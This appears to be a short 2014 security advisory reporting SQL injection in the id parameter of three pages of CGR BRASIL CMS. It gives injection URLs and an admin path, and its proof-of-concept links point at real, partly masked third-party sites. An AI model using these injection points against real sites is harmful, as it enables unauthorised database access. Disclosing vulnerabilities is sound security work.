CGR BRASIL CMS Sql Injection

2014.04.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

[+] Multiple Sql Injection on CGR BRASIL CMS [+] Date: 21/04/2014 [+] Risk: High [+] Author: Felipe Andrian Peixoto [+] Vendor Homepage: http://www.cgrbrasil.com.br [+] Contact: felipe_andrian@hotmail.com [+] Tested on: Windows 7 and Linux [+] Exploit : http://host/print.php?id=[SQL Injection] [+] Exploit2 : http://host/print_noticia.php?id=[SQL Injection] [+] Exploit3 : http://host/pop_up.php?id=[SQL Injection] [+] PoC: http://www.crddXms.com.br/print.php?id=19' [+] PoC: http://www.sindXate.org.br/print_noticia.php?id=35' [+] PoC: http://www.travXessurafestas.com.br/pop_up.php?id=2 [+] Admin Page : http://host/admin


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top